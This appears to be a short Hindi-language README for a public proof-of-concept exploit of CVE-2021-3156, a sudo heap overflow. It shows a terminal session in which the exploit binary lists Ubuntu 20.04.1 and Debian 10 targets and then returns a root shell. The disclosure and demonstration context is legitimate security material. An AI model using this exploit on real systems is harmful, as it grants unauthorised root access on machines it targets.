
CVE-2021-3156 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo में एक हीप-आधारित बफर ओवरफ्लो जो Ubuntu 20.04 और Debian 10 पर रूट तक स्थानीय विशेषाधिकार वृद्धि की अनुमति देता है।
xchg@ubuntu:~/Desktop/CVE-2021-3156$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC द्वारा blasty [email protected]
उपयोग: ./sudo-hax-me-a-sandwich
0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
xchg@ubuntu:~/Desktop/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC द्वारा blasty [email protected]
लक्ष्य का उपयोग कर रहे हैं: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31' ** अपने रूटशेल के लिए प्रार्थना करें.. ** [+] bl1ng bl1ng! हमें मिल गया!
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),1000(xchg)